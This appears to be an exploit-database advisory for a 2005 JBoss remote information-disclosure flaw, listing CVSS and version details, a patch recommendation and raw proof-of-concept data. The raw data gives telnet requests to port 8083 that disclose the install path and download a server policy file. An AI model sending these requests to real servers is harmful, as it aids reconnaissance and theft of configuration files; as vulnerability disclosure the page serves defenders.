JBoss Remote Information Disclosure Vulnerability

vendor:

JBoss

by:

SecurityFocus

4,3

CVSS

MEDIUM

Information Disclosure

200

CWE

Product Name: JBoss

Affected Version From: 3.2.x and 4.0.2

Affected Version To: 4.0.2

Patch Exists: YES

Related CWE: N/A

CPE: o:jboss:jboss

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

JBoss Remote Information Disclosure Vulnerability

JBoss is prone to a remote information-disclosure vulnerability. The issue occurs in the 'org.jboss.web.WebServer' class and is due to a lack of sufficient sanitization of user-supplied request data. Attackers can harvest information through leveraging this issue which may aid in further attacks against the affected service.

Mitigation:

Users should apply the latest available patches to help mitigate the risk of exploitation.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13985/info

JBoss is prone to a remote information-disclosure vulnerability. The issue occurs in the 'org.jboss.web.WebServer' class and is due to a lack of sufficient sanitization of user-supplied request data.

Information that attackers can harvest through leveraging this issue may aid in further attacks against the affected service. 

Example 1 (Installation path disclosure): [3.2.x and 4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %. HTTP/1.0

Reply:
HTTP/1.0 400 C:\Programme\jboss-4.0.2\server\default\conf (Zugriff
verweigert)
Content-Type: text/html

Example 2 (Config file download): [4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %server.policy HTTP/1.0